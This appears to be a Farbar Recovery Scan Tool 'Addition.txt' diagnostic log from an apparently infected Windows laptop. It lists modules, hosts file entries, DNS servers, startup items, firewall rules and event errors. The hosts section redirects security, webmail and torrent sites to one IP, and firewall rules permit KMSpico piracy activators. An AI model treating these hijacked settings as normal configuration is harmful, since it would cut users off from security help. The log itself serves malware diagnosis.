2016-04-06 09:29 - 2016-04-06 09:29 - 00011264 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32crypt.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00077312 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._html2.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00027136 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_multiprocessing.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00020480 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_yappi.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00035840 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32process.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00686080 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\unicodedata.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00078848 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._animate.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00123392 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._wizard.pyd 2016-04-06 09:29 - 2016-04-06 09:30 - 00024064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32pipe.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00010240 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\select.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00025600 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32pdh.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00017408 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32profile.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00022528 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32ts.pyd 2016-02-02 09:38 - 2016-02-03 11:58 - 00141312 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dl l 2016-02-02 09:38 - 2016-02-03 11:58 - 22330368 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files (x86)\M icrosoft Office\Office15\1033\GrooveIntlResource.dll 2015-04-08 13:38 - 2015-04-08 13:38 - 00471040 _____ () C:\Program Files (x86)\M endeley Desktop\Mendeley.dll 2016-02-03 17:53 - 2016-02-03 17:53 - 01382048 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\cpprest100_1_2.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00654608 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Lib\r1api.dll 2016-02-03 17:53 - 2016-02-03 17:53 - 06242107 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\videodl.exe ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included 
in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\WINDOWS\system32\Drivers\anwlblhj.sys:changelist [4642]
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [145]
AlternateDataStreams: C:\ProgramData\TEMP:5C1D8A71 [138]
AlternateDataStreams: C:\ProgramData\TEMP:661DFA1C [117]
AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [286]
==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. T he "AlternateShell" will be restored.) ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to d efault or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\partition
guru.com -> hxxp://www.partitionguru.com
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2012-07-26 07:26 - 2016-04-02 20:18 - 00011672 ____A C:\WINDOWS\system32\Drivers\etc\hosts
199.59.62.24 www.malwaretips.com
199.59.62.24 malwareremovalguides.info
199.59.62.24 onlinevirusrepair.com
199.59.62.24 enigmasoftware.com
199.59.62.24 pcrisk.com
199.59.62.24 malwarebytes.org/
199.59.62.24 tomshardware.co.uk
199.59.62.24 malwaretips.com
199.59.62.24 answers.yahoo.com
199.59.62.24 www.malwareremovalguides.info
199.59.62.24 www.onlinevirusrepair.com
199.59.62.24 www.enigmasoftware.com
199.59.62.24 www.pcrisk.com
199.59.62.24 guides.yoosecurity.com
199.59.62.24 www.malwarebytes.org/
199.59.62.24 www.tomshardware.co.uk
199.59.62.24 www.gmail.com
199.59.62.24 gmail.com
199.59.62.24 www.hotmail.com
199.59.62.24 hotmail.com
199.59.62.24 www.mail.ru
199.59.62.24 mail.ru
199.59.62.24 www.torrentz.eu
199.59.62.24 torrentz.eu
199.59.62.24 www.kat.ph
199.59.62.24 kat.ph
199.59.62.24 www.thepiratebay.se
199.59.62.24 thepiratebay.se
199.59.62.24 www.thepiratebay.org
199.59.62.24 thepiratebay.org
There are 356 more lines. ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1240968423-981972810-3087361095-1001\Control Panel\Desktop\\Wallpap er -> C:\Users\REVERIEN\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\ DesktopBackground\img0.jpg HKU\S-1-5-21-1240968423-981972810-3087361095-501\Control Panel\Desktop\\Wallpape r -> C:\WINDOWS\web\wallpaper\Toshiba\standard.jpg DNS Servers: 82.163.143.171 - 82.163.142.173 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPrompt BehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.)
HKLM\...\StartupApproved\Run: => "Everything" HKLM\...\StartupApproved\Run: => "HotKeysCmds" HKLM\...\StartupApproved\Run: => "IgfxTray" HKLM\...\StartupApproved\Run: => "Persistence" HKLM\...\StartupApproved\Run: => "RtHDVCpl" HKLM\...\StartupApproved\Run: => "TecoResident" HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD" HKLM\...\StartupApproved\Run: => "TCrdMain" HKLM\...\StartupApproved\Run: => "TODDMain" HKLM\...\StartupApproved\Run: => "TosWaitSrv" HKLM\...\StartupApproved\Run32: => "autodetect" HKLM\...\StartupApproved\Run32: => "Everything" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "RIMBBLaunchAgent.exe" HKLM\...\StartupApproved\Run32: => "TPUReg" HKLM\...\StartupApproved\Run32: => "APSDaemon" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\StartupFol der: => "Dropbox.lnk" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "G oogle Update" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "I DMan" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S kype" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S creencast-O-Matic Tray" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "V See" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.) 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{CED17A21-3FAE-49CF-9ECA-A918423B2CBF}] => (Allow) %systemroot%\ system32\alg.exe FirewallRules: [UDP Query User{A3AD89B2-EF64-4B02-8C8D-76D6EA791ABC}C:\program f iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti fy\connectify.exe FirewallRules: [TCP Query User{4EEFEEBC-829D-4AC5-A501-D7DD392F3F65}C:\program f iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti fy\connectify.exe FirewallRules: [{26CBC116-A886-41F6-901D-44B8945880D9}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{A1865D0E-DFB8-4358-AC73-2FA0CB843CC6}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{49110ED6-5883-4612-874C-AB647A68DF25}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{ED159E10-39F8-4B76-A3B3-F971B8CAE1AB}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{F924F07A-D2A8-420C-9B88-11AD4B2C8370}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{2C6DE3EC-72A5-4457-8146-3389688D98CC}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{07D4D389-98EA-40A9-83BA-D730EC5C9630}] => (Allow) LPort=1688 FirewallRules: [{C109F93D-9100-431D-B61E-83C93D6E996A}] => (Allow) C:\Program Fi les\KMSpico\AutoPico.exe FirewallRules: [{7180087A-69A0-49FC-A8C0-88DDD581BDD7}] => (Allow) C:\Program Fi
les\KMSpico\AutoPico.exe
FirewallRules: [{81227772-2DAA-4A12-AF45-6FD4A355B49D}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{9BACA3F2-6A32-43D2-9A57-FE02F540F858}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{EF122BC9-8ED2-4F76-9A83-979E295D2594}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{BC44951D-BA85-4509-A961-CC23E6570D30}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{FB9C1AA6-B1DC-4FAF-823C-D769CA11ED7F}] => (Allow) LPort=1688
FirewallRules: [{EAB34039-D997-49A7-96B5-57F98CCD1402}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{CAA82361-BF4D-4259-A3DF-830A363F74C4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{50EE1F7B-EEDB-46A0-99F8-FEA2C0BD925D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{29B0DB79-257F-40D0-AA83-C1AD16D8ADD7}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{52D27317-8D42-43FF-A895-4BB64E868B1E}] => (Allow) LPort=3306
FirewallRules: [{3CF0ED6F-3D1A-4F51-9E5E-4C2BD0B5C806}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{7C4E8E3C-1BB7-4E4C-AE79-DF4AC5C9B8D4}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{B631FD5E-2E77-4114-A834-AAEDAE48BAF6}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{D063D9A9-8BBB-481E-933B-CD7F0967A396}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{07E6D6A7-E7EF-4A4F-91A2-25057ED1E21F}] => (Allow) C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
FirewallRules: [{21B98EFC-048E-4BE2-BC33-0890B808A00D}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{74E32F51-08BF-496A-A141-2D2EAF121968}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{ED275BE1-9260-49CD-8405-134CE78CD8F7}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{D288FF71-31C1-4DF5-AFC5-175747EFA260}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{69B5AC7F-E405-4421-A111-09A6F9EEDD62}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe
FirewallRules: [{E6B96284-A2D9-4F0E-9CA7-813B79BC8EF0}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe
FirewallRules: [{8C677F5F-8553-429E-8E5E-7271B10687B7}] => (Allow) C:\Program Files (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe
FirewallRules: [{574FD494-3CA7-4021-8A39-F14DA44AFC16}] => (Allow) C:\Program Files (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe
FirewallRules: [{CD0B6F4B-0009-4EBC-A245-C5562ACE4FB4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C3C2D29B-B322-4EB2-B525-2F1273B1F716}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E9B53418-4574-45A0-8639-DC0D6707F655}] => (Allow) C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{F570D4F2-1C74-46C1-BCF1-1120781D9D59}] => (Allow) C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{9B9610DF-DAF7-4650-B8EB-BE4B5CAAE391}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\stats.com
FirewallRules: [{705BE377-AD8B-4F94-90AB-D2EFCB6644B4}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe
FirewallRules: [{02C0309B-F069-4FF4-9696-6487D878C8CE}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\stats.exe
FirewallRules: [{AEE1A837-3B32-4F4E-84D3-C59B67FC0D4F}] => (Allow) C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\stats.com FirewallRules: [{1283C0F1-9220-4572-9FA4-B585067FC7F4}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe FirewallRules: [{3696728A-EA99-464F-A76A-C4298E33CD6A}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\stats.exe FirewallRules: [{DC0F0CEB-84AC-4464-8BA3-4402EB74A9D6}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe FirewallRules: [{E5709ADD-BFFA-4A8C-A9B5-7E15E0582DC9}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe FirewallRules: [{DF2B8723-CEC4-4121-B6DB-19FDA93A6270}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe FirewallRules: [{BAB82F17-DE9D-4248-A0CB-8B5879ADB4D5}] => (Allow) C:\Program Fi les (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{54ABF091-1DF9-4B69-B37B-C41E73C69CB6}] => (Allow) LPort=2869 FirewallRules: [{862B93C9-B9A9-48FA-ADA3-55F921FF41A4}] => (Allow) LPort=1900 FirewallRules: [{6F700F9F-D2C2-468C-B86E-5CA39E1D4741}] => (Allow) C:\Program Fi les (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{5D10C7CA-B991-4391-B4D4-5C8BB7A03570}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe FirewallRules: [{87A90989-487D-4828-AA46-7A469FF67E99}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe FirewallRules: [{A33D9D2D-3F09-4532-BFCF-3F5E7EB512D8}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe FirewallRules: [{AB39E013-B069-4E52-9BE2-E0FFDB0DFFEB}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe FirewallRules: [{59651CC9-DAE1-45A7-B149-D8FC70DCE492}] => (Allow) C:\Program Fi les (x86)\Skype\Phone\Skype.exe FirewallRules: [TCP Query User{FEC06A52-37E7-4021-ACBD-CD78C3D93BDB}C:\users\rev erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata \roaming\vseeinstall\vsee.exe FirewallRules: [UDP Query 
User{45B734E6-71F3-4293-868A-6B2043316142}C:\users\rev erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata \roaming\vseeinstall\vsee.exe FirewallRules: [{80B7C41D-AE8A-4702-8BB8-17C136318964}] => (Block) C:\users\reve rien\appdata\roaming\vseeinstall\vsee.exe FirewallRules: [{EDC8A610-4B6C-4F1E-BD72-B18609B14D31}] => (Block) C:\users\reve rien\appdata\roaming\vseeinstall\vsee.exe FirewallRules: [TCP Query User{9CE82D32-5C0E-4E17-8B6D-E4944A71551B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [UDP Query User{E86DBDF3-5870-46CB-B2C1-7B01B124FD8B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [TCP Query User{4064EA95-343A-4444-AA16-7E87ABDFCDA6}C:\program f iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i bm\spss\statistics\20\stats.exe FirewallRules: [UDP Query User{47DFAE74-EBA1-4001-8308-3316B9D1FC26}C:\program f iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i bm\spss\statistics\20\stats.exe FirewallRules: [TCP Query User{C0110B3C-2BCF-4E80-AEF4-74B2F19B9830}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [UDP Query User{7C67A3A5-4C70-435B-A43A-897049E4F23B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [TCP Query User{1C739540-6B6E-4658-85DE-AE84B2115A96}C:\program f iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60 \bin\java.exe FirewallRules: [UDP Query User{625CADCA-9AD2-4D93-9946-9935A73F3C1A}C:\program f iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60
\bin\java.exe FirewallRules: [{9BE26317-4C02-4241-92DB-A8A1FC476E35}] => (Allow) C:\Program Fi les\KMSnano\qemu-system-i386.exe FirewallRules: [{0185FCB4-F83E-476C-8C83-7E96F997E750}] => (Allow) C:\Program Fi les\KMSnano\qemu-system-i386.exe FirewallRules: [{A94D9EED-B06D-40EF-BC22-696A748AA005}] => (Allow) c:\program fi les (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe FirewallRules: [TCP Query User{C5F57E73-72B0-41B8-BC44-8684B97CC4DA}C:\program f iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex e FirewallRules: [UDP Query User{739CCF3C-E344-4A02-9C2E-E15BE58C0F42}C:\program f iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex e FirewallRules: [TCP Query User{23EA3972-718B-4DC8-8F47-383CBD730E9E}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe FirewallRules: [UDP Query User{F0C8441B-10DA-43D0-ADD9-E489B359C9CC}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe FirewallRules: [{F653B5D8-9AAC-4521-9B17-DFB7DC379077}] => (Allow) C:\Program Fi les\Bonjour\mDNSResponder.exe FirewallRules: [{88671DA2-CC5A-49CB-A0C9-48B72A220E78}] => (Allow) C:\Program Fi les\Bonjour\mDNSResponder.exe FirewallRules: [{91A5D443-9D77-4A0B-8E80-B5D3392DD370}] => (Allow) C:\Program Fi les (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{87EF9B94-EE96-466E-BD82-8CE5117E7A10}] => (Allow) C:\Program Fi les (x86)\Bonjour\mDNSResponder.exe FirewallRules: [TCP Query User{70B2A856-2AF0-424D-8629-2DB1B396EC82}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe FirewallRules: [UDP Query User{10211271-2BDC-42C2-B961-8DB4582E4C2F}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe ==================== Restore Points ========================= ATTENTION: System Restore is disabled ==================== Faulty Device Manager Devices ============= 
Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 788: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 776: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 776: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 1016: ERROR: read_msg errno 0 (The operation completed successfully .) Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 976: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 System errors: ============= Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The User Data Access_560cb16 service terminated unexpectedly. It ha s done this 1 time(s). The following corrective action will be taken in 10000 mi lliseconds: Restart the service. Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The User Data Storage_560cb16 service terminated unexpectedly. It h as done this 1 time(s). The following corrective action will be taken in 10000 m illiseconds: Restart the service. 
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The Contact Data_560cb16 service terminated unexpectedly. It has do ne this 1 time(s). The following corrective action will be taken in 10000 millis econds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The Sync Host_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseco nds: Restart the service. Error: (04/06/2016 09:27:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/05/2016 08:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/05/2016 05:02:15 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/05/2016 03:08:37 PM) (Source: bowser) (EventID: 8003) (User: ) Description: The master browser has received a server announcement from the comp uter ACER that believes that it is the master browser for the domain on transport NetBT_Tc pip_{D3A7E1A2-BF66-4FA4-B421-289C91B29B3B}. The master browser is stopping or an election is being forced. Error: (04/05/2016 02:40:17 PM) (Source: bowser) (EventID: 8003) (User: ) Description: The master browser has received a server announcement from the comp uter LENOVO that believes that it is the master browser for the domain on transport NetBT_Tc pip_{C7344E23-A6A5-4EEE-9867-288EC4D5B277}. The master browser is stopping or an election is being forced. Error: (04/05/2016 01:02:47 PM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The UpdateSvc service terminated unexpectedly. 
It has done this 2 t ime(s). The following corrective action will be taken in 60000 milliseconds: Res tart the service. CodeIntegrity: =================================== Date: 2016-04-06 09:07:15.285 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-06 09:07:15.243 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-04 14:22:01.468
Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-04 12:03:02.209 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-04 12:03:02.171 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-02 20:08:57.152 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-30 14:43:23.764 Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system. Date: 2016-03-30 14:29:38.240 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements. 
Date: 2016-03-30 13:46:03.397 Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system. Date: 2016-03-30 13:37:25.565 Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz Percentage of memory in use: 53% Total physical RAM: 6027.22 MB Available physical RAM: 2815.9 MB Total Virtual: 8587.22 MB Available Virtual: 4472.3 MB ==================== Drives ================================ Drive c: (TI31061100A) (Fixed) (Total:119.2 GB) (Free:20.51 GB) NTFS Drive e: () (Fixed) (Total:166.29 GB) (Free:10.71 GB) NTFS Drive h: () (Removable) (Total:7.44 GB) (Free:4.04 GB) FAT32
==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000) Partition: GPT. ======================================================== Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== End of Addition.txt ============================